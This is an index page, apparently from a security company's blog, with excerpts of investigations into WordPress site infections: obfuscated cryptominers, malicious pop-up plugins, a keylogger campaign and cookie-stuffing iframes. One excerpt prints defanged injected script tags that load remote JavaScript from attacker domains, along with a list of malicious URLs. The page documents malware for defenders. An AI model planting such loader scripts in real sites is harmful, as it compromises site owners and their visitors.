Wikipedia Page Review Reveals Minr Malware

Since December, we’ve seen a number of websites with this funny looking obfuscated script injected at the very top of the HTML code (before the <html> tag). This code is generated by the well-known JJEncode obfuscator, which was once quite popular for encrypting malicious code. Since its popularity dwindled a few years ago, we’ve hardly seen any new malware using it. It was definitely a surprise for us when approximately 3 months ago we noticed the JJEncode obfuscator was once again in use: Minr cryptominer began using it to obfuscate scripts that they loaded from multiple domains like web.clodpw. Continue reading Wikipedia Page Review Reveals Minr Malware at Sucuri Blog.
Read more

Unwanted Pop-ups Caused by Injectbody/Injectscr Plugins

On February 8th, 2018, we noticed a new wave of WordPress infections involving two malicious plugins: injectbody and injectscr. These plugins inject obfuscated scripts, creating unwanted pop-up/pop-unders. Whenever a visitor clicks anywhere on an infected web page, they are served questionable ads. Plugin Location The malicious plugins possess a very similar file structure: Injectbody wp-content/plugins/injectbody/ injectbody.php: 2146 bytes (the plugin code) inject.txt: 2006 bytes (injected JavaScript) Injectscr wp-content/plugins/injectscr/ injectscr.php: 1319 bytes (the plugin code) inject.txt: 3906 bytes (injected JavaScript) The functionality of these plugins are also very similar. Continue reading Unwanted Pop-ups Caused by Injectbody/Injectscr Plugins at Sucuri Blog.
Read more

Cloudflare[.]solutions Keylogger Returns on New Domains

A few months ago, we covered two injections related to the “cloudflare.solutions” malware: a CoinHive cryptominer hidden within fake Google Analytics and jQuery, and the WordPress keylogger from Cloudflaresolutions. This malware was originally identified by one of our analysts in April 2017 and has since evolved and spread to new domains. Keylogger Spreads to New Domains A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflaresolutions domain was taken down. Continue reading Cloudflaresolutions Keylogger Returns on New Domains at Sucuri Blog.
Read more

Malicious Website Cryptominers from GitHub. Part 2.

Recently we wrote about how GitHub/GitHub.io was used in attacks that injected cryptocurrency miners into compromised websites. Around the same time, we noticed another attack that also used GitHub for serving malicious code. Encrypted CoinHive Miner in Header.php The following encrypted malware was found in the header.php file of the active WordPress theme: There are four lines of code in total. Each, when decoded, plays a different role. CoinHive Injections When decoded, the last two lines inject typical CoinHive cryptocurrency miners: The miner is only shown conditionally, so bots are excluded and only human visitors will receive it. Continue reading Malicious Website Cryptominers from GitHub. Part 2. at Sucuri Blog.
Read more

Malicious Cryptominers from GitHub

Recently, a webmaster contacted us when his AVG antivirus reported that the JS:Miner-C infection was found on their site. Our investigation revealed a hidden iframe had been injected into the theme’s footer.php file: wpupdates.githubio/ping/" style="width:0;heigh:0;border:none;"> When we opened the URL in a browser, the page was blank. After checking the HTML source code, we discovered a piece of JavaScript using the CoinHive miner with the site key, CZziRExmOxYEE65Hm4E9fycCuNqZH1G9 and the username, MoneroU. Continue reading Malicious Cryptominers from GitHub at Sucuri Blog.
Read more

Cloudflare[.]Solutions Keylogger on Thousands of Infected WordPress Sites

A few weeks ago, we wrote about a massive WordPress infection that injected an obfuscated script pretending to be jQuery and Google Analytics. In reality, this script loaded a CoinHive cryptocurrency miner from a third-party server. We also mentioned a post written back in April that described the cloudflare.solutions malware, which came along with the cryptominers. At this moment, PublcWWW reports there are 5,482 sites infected with this malware. It seems that this evolving campaign is now adding keyloggers to the mix. Continue reading CloudflareSolutions Keylogger on Thousands of Infected WordPress Sites at Sucuri Blog.
Read more

Cryptominers on Hacked Sites – Part 2

Last month we wrote about how the emergence of website cryptocurrency miners resulted in hackers abusing the technology by injecting the CoinHive miners into compromised sites without the consent of the website owners. We reviewed two types of infections that affected WordPress and Magento sites, and have been monitoring the malicious use of the CoinHive cryptominer. What we are discovering is that there are more and more attacks in the wild using cryptominers, which affects all major CMS platforms. Continue reading Cryptominers on Hacked Sites – Part 2 at Sucuri Blog.
Read more

Hacked Websites Mine Cryptocurrencies

Cryptocurrencies are all the rage now. Bitcoin, altcoins, blockchain, ICO, mining farms, skyrocketing exchange rates – you see or hear this everyday in news now. Everyone seems to be trying to jump on this bandwagon. This trend resulted in emergence of online platforms that allow webmasters to install coin miners into their websites as an alternative means of monetization. The most notable platforms that provide JavaScript cryptocurrency miners for web sites are JSE Coin and Coinhive . Continue reading Hacked Websites Mine Cryptocurrencies at Sucuri Blog.
Read more

Old Themes, Abandoned Scripts and Pitfalls of Cleaning Serialized Data

Over the summer we’ve seen waves of WordPress database infections that use vulnerabilities in tagDiv’s Newspaper/Newsmag themes or InterconnectIT Search and Replace scripts (searchreplacedb2.php). The injections range from ad scripts coming from established ad networks like shorte.st to new domains created specifically for those attacks. Typical injected scripts look like this: <s cript type='text/javascript' src='hxxps://con1.sometimesfreebiz/c.js'></script> Or: <s cript type="text/javascript">var t = document.createElement("script"); t.type = "text/javascript"; t.src = "hxxps://srcdancewithmebiz/src.js"; document.head.appendChild(t);</script> Or: The most noticeable malicious URLs that we’ve seen lately are: con1.sometimesfreebiz/c.js (185.82.217.166 Bulgaria) java.sometimesfreebiz/counter.js (185.82.217.166 Bulgaria) javascript.sometimesfreebiz/script.js (185.82.217.166 Bulgaria) js.givemealetterbiz/script.js (185.82.217.166 Bulgaria) go.givemealetterbiz/click.html (185.82.217.166 Bulgaria) traffictradelife/scripts.js (200.7.105.43 United Kingdom) blue.traffictradelife/main.js (200.7.105.43 United Kingdom) js.trysomethingneweu/analytics.js (94.156.144.19 Bulgaria) get.simplefunsiteinfo/rw.js (won’t resolve atm) post.simplefunsiteinfo/go.php?rewrite=81 (won’t resolve atm) src.dancewithmebiz/src.js (185.159.82.2 – Russia) go.dancewithmebiz/red.php (185.159.82.2 – Russia) They are all new domains registered specifically for this attack: traffictradelife – created on July 3rd, 2017 trysomethingneweu – created on Aug 11th, 2017 sometimesfreebiz – created on August 22nd, 2017 givemealetterbiz – created on August 27th, 2017 simplefunsite.info – created on September 2nd, 2017 dancewithmebiz – created on September 5th, 2017 Malware in WordPress Database In most cases the scripts are injected right before <a href tags in the post content (wp_posts), meaning that webmasters may need to remove multiple injected scripts from hundreds of posts in the database – definitely...
Read more

Affiliate Cookie Stuffing in iFrames

Inline frames (iFrames) are an easy way to embed content from another site onto your own. This element allows you to insert another document inside an HTML page and can be really useful for embedding interactive applications like Google maps, advertisements and ecommerce applications. iFrame elements are also popular with website attackers because it allows them to easily load malicious content from their own servers. Attackers often use this feature to insert malicious content into compromised sites for the purpose of spam redirection, phishing, and distributing malware. Continue reading Affiliate Cookie Stuffing in iFrames at Sucuri Blog.
Read more
Page 1 of 212